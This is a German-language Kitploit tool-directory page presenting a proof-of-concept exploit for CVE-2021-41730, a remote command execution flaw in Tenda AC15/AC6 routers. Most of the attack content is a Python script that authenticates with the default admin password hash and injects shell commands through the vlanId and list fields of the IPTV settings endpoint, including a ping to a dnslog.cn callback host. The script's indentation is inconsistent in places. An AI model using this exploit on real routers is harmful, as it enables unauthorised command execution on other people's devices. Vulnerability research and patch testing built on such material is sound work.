Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41730 — Proof-of-concept-Exploit für CVE-2021-41730, der eine Remote-Befehlsausführung in TENDA AC15/AC6-Routern über unvalidierte formSetIptv()-Parameter demonstriert. Enthält Python-POC und Schwachstellenanalyse. | Kitploit
Tools/GitHubGitHub/yezeting/cve-2021-41730
Embedded-System-SicherheitPayload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlHardware- & IoT-Sicherheit
GitHubyezeting/cve-2021-41730

CVE-2021-41730

Proof-of-concept-Exploit für CVE-2021-41730, der eine Remote-Befehlsausführung in TENDA AC15/AC6-Routern über unvalidierte formSetIptv()-Parameter demonstriert. Enthält Python-POC und Schwachstellenanalyse.

4vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

TENDA Authorization Remote Command Execution

Exploit-Autor: SHENGXI HUANG([email protected])
Hersteller: TENDA

CVE-2021-41730 - /bin/httpd

Firmware-Version:
AC15: <=US_AC15V1.0BR_V15.03.05.20_multi_TDE01.bin
AC6: US_AC6V1.0BR_V15.03.05.16_multi_TD01.bin
.......
Hardware-Link: https://www.tendacn.com/en/download/detail-3858.html

Details zur Sicherheitslücke

In der httpd-Binärdatei können Angreifer aufgrund fehlender gültiger Überprüfung die Werte der Felder stbEn, igmpEn, iptvType, vlanId und List in Paketen manipulieren, um eine Reihe von Umgehungen zu realisieren, was zu einer Sicherheitslücke bei der entfernten Ausführung beliebiger Befehle führt.

Funktion zum Auslösen der Sicherheitslücke

formSetIptv()
image

Tatsächliche Funktion zum Auslösen der Sicherheitslücke

sub_B0F14() / sub_B1100() image

sub_B0F14()

image

sub_B1100()

image

Burpsuite-Abfang

image

POC

root@kitploit:~
# !/usr/bin/env python
# -*- coding: utf-8 -*-
import requests

def POC(ip,cmd1,cmd2,pwd):
    try:
        body = {
            'username': 'admin',
            'password': pwd
        }
        headers = {
            'Host': ip,
            'Accept': '*/*',
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
            'X-Requested-With': 'XMLHttpRequest',
            'Origin': 'http://' + ip,
            'Referer': 'http://' + ip + '/login.html',
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.9',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Connection': 'close'
        }
        r = requests.post(url="http://" + ip + "/login/Auth",
                          data=body,
                          headers=headers,
                          allow_redirects=False )
        password = r.headers['Set-Cookie'].strip("password=").strip("; path=/")
        try:
            body = {
                'stbEn':'1',
                'igmpEn':'0',
                'iptvType':'manual',
                'vlanId':cmd1,
                'list':cmd2 }
           headers = {
                'Host': ip,
                'Accept': 'application/json, text/javascript, */*; q=0.01',
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36',
                'X-Requested-With': 'XMLHttpRequest',
                'Origin': 'http://'+ip,
                'Referer': 'http://'+ip+'/iptv.html?random=0.5429353367490362&',
                'Accept-Encoding': 'gzip, deflate',
                'Accept-Language': 'zh-CN,zh;q=0.9',
                'Cookie': 'password='+password,
                'Content-Type':'application/x-www-form-urlencoded'}
           r = requests.post(url="http://" + ip + "/goform/SetIPTVCfg",
                              data=body,
                              headers=headers,
                             allow_redirects=False)
            print(r.text)
       except Exception as e:
           print("[error]:", ip)
    except Exception as e:
        print("[error]:", ip)


if __name__ == "__main__":
    ip = '192.168.0.1'
    cmd1 = '1";ping -c 5 fry8vd.dnslog.cn;echo "'
    cmd2 =  '1";echo 2>/tmp/hello3.txt;echo "'
    password = '21232f297a57a5a743894a0e4a801fc3'
    POC(ip,cmd1,cmd2,password)

DEMO

Video ansehen

Tool herunterladen